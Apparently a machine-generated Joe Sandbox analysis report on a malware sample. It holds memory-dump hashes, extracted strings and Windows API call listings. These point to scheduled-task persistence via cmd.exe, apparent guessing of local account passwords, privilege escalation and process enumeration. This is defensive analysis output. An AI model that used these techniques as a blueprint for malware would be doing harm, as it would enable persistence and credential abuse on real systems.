                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: VUUU
                                                                                                                                                                                                                • API String ID: 0-2040033107
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                                • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                                • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                                • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                                • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                                • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                                • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                                • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                                • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
Memory Dump Source
• Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                • String ID: 00-->$<Actions $p=5w
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?,7702DB30), ref: 00403060
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                  • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                  • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                  • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                                • String ID: cmd.exe$p=5w
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7702DB30), ref: 00401EC6
                                                                                                                                                                                                                • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7702DB30), ref: 00401EE2
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                                • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                  • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                                • String ID: %s1$%s12$%s123
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                                • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                                • String ID: PnEw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,7735E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,7735E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,7702DB30), ref: 004015CF
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:3.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:85.9%
                                                                                                                                                                                                                Signature Coverage:18.3%
                                                                                                                                                                                                                Total number of Nodes:1109
                                                                                                                                                                                                                Total number of Limit Nodes:25
